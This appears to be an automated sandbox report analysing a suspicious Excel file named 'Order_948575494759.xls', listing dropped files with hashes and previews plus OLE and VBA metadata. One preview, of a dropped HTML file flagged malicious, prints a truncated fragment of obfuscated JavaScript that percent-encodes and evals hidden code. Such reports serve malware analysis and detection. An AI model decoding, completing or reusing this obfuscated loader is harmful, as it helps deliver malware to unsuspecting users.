          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.....................................................4B..4B....T.n.T.n........................./......H.G....../.........x.n.............................X.....n..X@l....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1293620
          Entropy (8bit):4.563127917199792
          Encrypted:false
          SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
          MD5:F71C973B5E362DFD6408D6C009E5643E
          SHA1:24B3CE67B31BFD4791287932206D54C73489424E
          SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
          SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
          Malicious:false
          Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.7989721466737993
          Encrypted:false
          SSDEEP:1536:osnMAjSUbP8tV6XkRMamXUv6INHOqXbk0WYqEkRvvK:osnPSG8t5gK
          MD5:AEFDFC804B62072421A576D899ECF67D
          SHA1:140011AB7937A77B187959A94286B8DFE7FC2FC3
          SHA-256:DAF38CC675CF9F1D53EACDB46322F9F5D056524FA8097A23C82C75CAA2802DCF
          SHA-512:C7536786783584998DA834A46607A5314E1D151DC3B52541A93C19AB6E1BB4651E76E5F0EFE6EB36E93E3B2A514035927E8E512DC806D696447309A4B8FE75DB
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.4289254449475277
          Encrypted:false
          SSDEEP:96:EV5g2s88nDHlgaX9VoI5i9AWZBKlA+B79YIRdMZgmR7qii1BoFV:EaHOaXtBWZ4F79RdGgmR7qii1BY
          MD5:76F7CFF5327422B48780C2A0B17F3C2D
          SHA1:167AC9AFA53E67757988688EDE17165B83B925C4
          SHA-256:DEFF5D57F7CCAC0F65F5A098F7284EE10311201A35510230C55DA338C69EAF1C
          SHA-512:7648AD534AECBD72C6DF8F6BD729D8DEB0FE433AB8FD651F45951FF2C5C6A687CEA73C434E16DC195B23E59D16D802C3BDB1CA0182AF8457225184E41B5F2831
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13284
          Entropy (8bit):2.735825271732709
          Encrypted:false
          SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
          MD5:901DCD18F7643CAEBDE4301E05F5C748
          SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
          SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
          SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
          Malicious:false
          Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i......................................................................................../....(....../...................._...(...................N../.............m./L...............L....................../........\........./
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
          Category:dropped
          Size (bytes):8896
          Entropy (8bit):2.805964965465494
          Encrypted:false
          SSDEEP:192:tHaCEHfLum2oum2J5KUJDVUKhC74GVf/Aq2v9PV8aQeS2eLPyqv6vRc6cfzqfz45:t1EHfLum2oum2J5KUJDVUKhC74GVf/Ak
          MD5:FFAADBF04E0201F2413D3E81B47B50F5
          SHA1:FC490F928D5E8791CCC26C4C957F3786FEF50BB2
          SHA-256:648358DD4259AD9FC6E5F723487B6F009110CD976701032931163A74555258B0
          SHA-512:D726B722657BEAD1FE160C953A43AE7D46970E0AA8F2C405D9E72D6A853443F14D1A2512B04399D5798B39DAD8332C8BDC900216AA1A1E6B656925A224B6EED7
          Malicious:true
          Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):934
          Entropy (8bit):2.7129194926077287
          Encrypted:false
          SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZfp:YmbCHaMfzLmcL8AJtfJ52IH2ZB
          MD5:B84DC9A70357CE4B06F0833A82C37369
          SHA1:C2FEF77BD96A6A7A9519DBC0318F51E74B7D3277
          SHA-256:1FC1E853D3B7FB897F4147B40F85547488C438146D117ED53691128ACF5D5076
          SHA-512:8B1F36ECB53789AA3B63E6B27A2D0C9C399DA4DA558AFA919FB05153112F10D250C4C214420BBEE70184142AB218354F2C91EFAB333823B39C7129D2C4A0961A
          Malicious:false
          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.3.1.4.1.5.9.2.0.,.6.1.7.0.7.3.0.5.,.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):229376
          Entropy (8bit):6.47134305419715
          Encrypted:false
          SSDEEP:6144:MX/nk3hbdlylKsgwyzcTbWhZFVE+WaxHArWhcx7PIDqZ8:MvfW+xPJ
          MD5:AD74FBC8844B2BE7DAD53FA11CC821EC
          SHA1:3FA4882624E3D490D9CFA9FC85546EA85E990D73
          SHA-256:3BE69CD7DCC3D1D94172D27FFC29E4FFC61BBE097AC30BC1EF419CF5C32E6E3B
          SHA-512:8019C5C0FD547E3230F2CE2FDB96D77E2F4F43CD22F1AE82D4F9EF8F338192D86E91A2B392C69C309F0446A13D9A07BEDEE1B43FA279C41431C11F475A0F4A99
          Malicious:false
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):6.471701880830442
          Encrypted:false
          SSDEEP:192:+WCUgZod0m9vnUufWG72ofW2snm2bBxPDmSj8+2xFSOP:hjgZoemlnUufV2oO28nfDj8RxoOP
          MD5:0306404AE1ED70ECFB5D7055544004F6
          SHA1:8E2A7DF6849767FE3177DF57E7C1F0CC28D2955D
          SHA-256:92A00C7A1AC117504D77F25FC31B9F115D200856DF548C327B2A8CF4EFB19165
          SHA-512:6F8B348A738E2D295435D77E46C5D8A7D8DBE974110D7E8D5BE34F072AAA16D5651814A82A7C90234F14C98D9D20B3E88B2BA4562ADB5F06A57C367DC3737DAF
          Malicious:false
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):53760
          Entropy (8bit):7.376720775329219
          Encrypted:false
          SSDEEP:768:beVIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvvYVZAfB:b3HbXpsJ2crDtkFZ8nuXBB
          MD5:823F8D8B32B00E47FDDA94A1A8DB0D3F
          SHA1:813FD51B5B8C95D11628B212AD2B8BF5CE8BB479
          SHA-256:B666BC05587BD07B62696CEB58FBBA4A711891A6B37B87651C5510FD8620E75A
          SHA-512:E0264350816B15BA1153CAC4ADB946F5F6E713F5B50358A847D67C3E362203A634F587DF799DE4E08CBD2C818B70281D6B2D22CBAF6252C5A41BDA7EDB438580
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):7.455076715618045
          Encrypted:false
          SSDEEP:768:2q/DwTo0TJZpXXGvdfBwEhkYhePDJK7ilqjqSrN:Dh0tZp4tSEqoePdHl3
          MD5:C9110FD3EFFCA11B4F1BB9E81403D9DA
          SHA1:AFEF6A2086A8B0EFC96D635DE5AA9C30EE737D5C
          SHA-256:0FFEB7FD85D53C869D1C8D546FAB51E046D204F3722A5920E6596EBB03175F89
          SHA-512:0FB8490C3C527F7876C3177BCBF36A184E202F5E2118871B7B34465379F8C3CBCB8D8FF0FDCF127B81E52CA6016B349799DBA1F36CE02772B995481ADFD470D2
          Malicious:false
          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 14:02:32 2024, Security: 1
          Category:dropped
          Size (bytes):858112
          Entropy (8bit):7.626998406652026
          Encrypted:false
          SSDEEP:12288:4vFW+iJEUiOIBUzMTSRD3DERnLRmF8DhEPbxpsAQx1Zj+j9EPYPJWTJ8:4ABaQbARM8A78Z+joYPJo8
          MD5:8450D1CF676B2A894ED55B4B3892F975
          SHA1:A2FCDC5107DB1E657100783E1EE1FFD523F37EFF
          SHA-256:5E466686B67DB48B3B194DF09F439229B8A232A7909F2ACEA56E780CE3356474
          SHA-512:A58A183EE17C4E64B8697A9F9A98A256450E0A7F7EA164F0F46D5738808D3633973E9AF6EF281C8FC601791BFA9F63DF8FC040B028C6B4237AB1A16E4F1C79C4
          Malicious:false
          Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:false
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 14:02:32 2024, Security: 1
          Category:dropped
          Size (bytes):858112
          Entropy (8bit):7.626998406652026
          Encrypted:false
          SSDEEP:12288:4vFW+iJEUiOIBUzMTSRD3DERnLRmF8DhEPbxpsAQx1Zj+j9EPYPJWTJ8:4ABaQbARM8A78Z+joYPJo8
          MD5:8450D1CF676B2A894ED55B4B3892F975
          SHA1:A2FCDC5107DB1E657100783E1EE1FFD523F37EFF
          SHA-256:5E466686B67DB48B3B194DF09F439229B8A232A7909F2ACEA56E780CE3356474
          SHA-512:A58A183EE17C4E64B8697A9F9A98A256450E0A7F7EA164F0F46D5738808D3633973E9AF6EF281C8FC601791BFA9F63DF8FC040B028C6B4237AB1A16E4F1C79C4
          Malicious:true
          Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t.......q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 18 01:00:45 2024, Security: 1
          Entropy (8bit):7.743408666722072
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Order_948575494759.xls
          File size:1'124'352 bytes
          MD5:6bcc53dc843155e886f469778b4216f1
          SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
          SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
          SHA512:cd6da13c89795461e4b804be52500b9db81887d18cadb0dd431cc49850db189f4e6dbb9731810d3ae55c7145ee46ee5fdc9e9606dfc73b08c2d9e5a9169abc28
          SSDEEP:12288:y8zJmzHJEUiOIBUzMTSSD3DERnLRmF8DhEPpxpsAQx1Zj+jLEPHbrpW8osAz85qW:MBanbARM8At8Z+j6RsSIUAI
          TLSH:0C35F1E5774DAB52CA06123575F3939E2714AC03D902427B36F8732D2AF7AD08607FA6
          File Content Preview:........................>.......................................................i...j...k...l...m...............V...W...r.......g.......i......................................................................................................................
          Icon Hash:35ed8e920e8c81b5
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Author:
          Last Saved By:
          Create Time:2006-09-16 00:00:00
          Last Saved Time:2024-12-18 01:00:45
          Creating Application:Microsoft Excel
          Security:1
          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:786432
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook.cls
          Stream Size:985
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ThisWorkbook"
          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 9c b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet1"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
          VBA File Name:Sheet2.cls
          Stream Size:977
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 9d 36 86 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Sheet2"
          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
